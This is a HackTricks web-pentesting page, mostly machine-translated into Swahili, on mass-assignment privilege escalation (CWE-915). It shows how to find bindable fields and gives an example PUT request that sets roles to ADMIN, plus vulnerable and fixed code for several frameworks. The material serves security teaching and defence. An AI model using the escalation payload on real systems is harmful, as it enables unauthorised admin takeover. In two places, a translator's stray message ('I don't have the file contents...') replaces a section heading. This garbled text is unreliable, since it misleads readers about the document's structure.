HackTricksMass Assignment (CWE-915) – Privilege Escalation via Unsafe Model Binding
Reading time: 7 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Mass assignment (a.k.a. insecure object binding) hutokea wakati API/controller inapokea JSON inayotolewa na mtumiaji na kuiweka moja kwa moja kwenye server-side model/entity bila orodha wazi ya fields zinazoruhusiwa. Ikiwa mali zenye kipaumbele kama roles, isAdmin, status, au fields za ownership zinaweza kufungwa (bindable), mtumiaji yeyote aliye na uthibitisho anaweza kuongeza ruhusa au kubadilisha state iliyo chini ya ulinzi.
Hili ni tatizo la Broken Access Control (OWASP A01:2021) ambalo mara nyingi linawezesha vertical privilege escalation kwa kuweka roles=ADMIN au vitu vinavyofanana. Mara nyingi linaathiri frameworks zinazounga mkono automatic binding ya request bodies kwa data models (Rails, Laravel/Eloquent, Django ORM, Spring/Jackson, Express/Mongoose, Sequelize, Go structs, etc.).
1) Finding Mass Assignment
Tafuta endpoints za self-service zinazosasisha profile yako mwenyewe au rasilimali zinazofanana:
- PUT/PATCH /api/users/{id}
- PATCH /me, PUT /profile
- PUT /api/orders/{id}
Heuristics indicating mass assignment:
- Majibu yanarudia server-managed fields (kwa mfano roles, status, isAdmin, permissions) hata wakati hutawatuma.
- Client bundles zina majina/IDs ya roles au majina mengine ya attributes zenye kipaumbele zinazotumika katika app (admin, staff, moderator, internal flags), zikionyesha schema inayoweza kufungwa.
- Backend serializers zinakubali fields zisizojulikana bila kuzikataa.
Mtiririko wa mtihani wa haraka:
- Fanya update ya kawaida kwa kutumia fields salama tu na tazama muundo kamili wa JSON response (this leaks the schema).
- Rudia update ukijumuisha field yenye kipaumbele uliyotengeneza ndani ya body. Ikiwa response inathibitisha mabadiliko, kuna uwezekano una mass assignment.
Example baseline update revealing schema:
PUT /api/users/12934 HTTP/1.1
Host: target.example
Content-Type: application/json
{
"id": 12934,
"email": "user@example.com",
"firstName": "Sam",
"lastName": "Curry"
}
Jibu linaonyesha mashamba yenye mamlaka ya juu:
HTTP/1.1 200 OK
Content-Type: application/json
{
"id": 12934,
"email": "user@example.com",
"firstName": "Sam",
"lastName": "Curry",
"roles": null,
"status": "ACTIVATED",
"filters": []
}
2) Exploitation – Role Escalation via Mass Assignment
Mara tu unapojua bindable shape, jumuisha property ya 'privileged' katika ombi lile lile.
Mfano: set roles to ADMIN on your own user resource:
PUT /api/users/12934 HTTP/1.1
Host: target.example
Content-Type: application/json
{
"id": 12934,
"email": "user@example.com",
"firstName": "Sam",
"lastName": "Curry",
"roles": [
{ "id": 1, "description": "ADMIN role", "name": "ADMIN" }
]
}
Iwapo mabadiliko ya role hayataonekana baada ya majibu, fanya tena uidhinishaji au refresh tokens/claims ili app itoe session ya admin-context na ionyeshe UI/endpoints zenye kipaumbele.
Vidokezo
- Role identifiers na miundo mara nyingi huhesabiwa kutoka client JS bundle au API docs. Tafuta mfululizo wa herufi kama "roles", "ADMIN", "STAFF", au nambari za role.
- Iwapo tokens zina claims (mfano, JWT roles), kawaida inahitajika logout/login au token refresh ili vibali vipya vitambuliwe.
3) Client Bundle Recon for Schema and Role IDs
- Kagua minified JS bundles kwa role strings na model names; source maps zinaweza kufichua DTO shapes.
- Tafuta arrays/maps za roles, permissions, au feature flags. Tengeneza payloads zinazolingana na property names halisi na nesting.
- Viashiria vya kawaida: role name constants, dropdown option lists, validation schemas.
Handy greps against a downloaded bundle:
strings app.*.js | grep -iE "role|admin|isAdmin|permission|status" | sort -u
4) Mapungufu ya Framework na Miundo Salama
Udhaifu hutokea wakati frameworks zinapobandika req.body moja kwa moja kwenye entities zenye kudumu. Hapa chini kuna makosa ya kawaida na miundo ya msingi, salama.
Node.js (Express + Mongoose)
Inayoweza kuathiriwa:
// Any field in req.body (including roles/isAdmin) is persisted
app.put('/api/users/:id', async (req, res) => {
const user = await User.findByIdAndUpdate(req.params.id, req.body, { new: true });
res.json(user);
});
I don't have the file contents. Please paste the contents of src/pentesting-web/mass-assignment-cwe-915.md (or describe the specific part to fix) and I'll translate it to Swahili while keeping all markdown/html, code, links, tags and paths unchanged as requested.
// Strict allow-list and explicit authZ for role-changing
app.put('/api/users/:id', async (req, res) => {
const allowed = (({ firstName, lastName, nickName }) => ({ firstName, lastName, nickName }))(req.body);
const user = await User.findOneAndUpdate({ _id: req.params.id, owner: req.user.id }, allowed, { new: true });
res.json(user);
});
// Implement a separate admin-only endpoint for role updates with server-side RBAC checks.
Ruby on Rails
Inayoweza kuathiriwa (hakuna strong parameters):
def update
@user.update(params[:user]) # roles/is_admin can be set by client
end
Sahihisha (strong params + no privileged fields):
def user_params
params.require(:user).permit(:first_name, :last_name, :nick_name)
end
Laravel (Eloquent)
Dhaifu:
protected $guarded = []; // Everything mass-assignable (bad)
I don't have the file contents. Please paste the content of src/pentesting-web/mass-assignment-cwe-915.md that you want translated to Swahili (keeping markdown/html tags intact).
protected $fillable = ['first_name','last_name','nick_name']; // No roles/is_admin
Spring Boot (Jackson)
Mfano hatarishi:
// Directly binding to entity and persisting it
public User update(@PathVariable Long id, @RequestBody User u) { return repo.save(u); }
Rekebisha: Ramisha kwenye DTO yenye tu viwanja vilivyokubaliwa na utekeleze idhinishaji:
record UserUpdateDTO(String firstName, String lastName, String nickName) {}
Kisha nakili fields zinazoruhusiwa kutoka DTO hadi entity upande wa server, na shughulikia mabadiliko ya role tu katika handlers za admin pekee baada ya ukaguzi wa RBAC. Tumia @JsonIgnore kwenye fields zilizo na ruhusa maalum ikiwa inahitajika na kata properties zisizojulikana.
Go (encoding/json)
- Hakikisha fields zilizo na ruhusa maalum zinatumia json:"-" na thibitisha kwa DTO struct inayojumuisha tu fields zinazoruhusiwa.
- Fikiria kutumia decoder.DisallowUnknownFields() na uthibitisho baada ya bind wa invariants (roles haiwezi kubadilika katika routes za self-service).
Marejeo
- FIA Driver Categorisation: Admin Takeover via Mass Assignment of roles (Full PoC)
- OWASP Top 10 – Broken Access Control
- CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.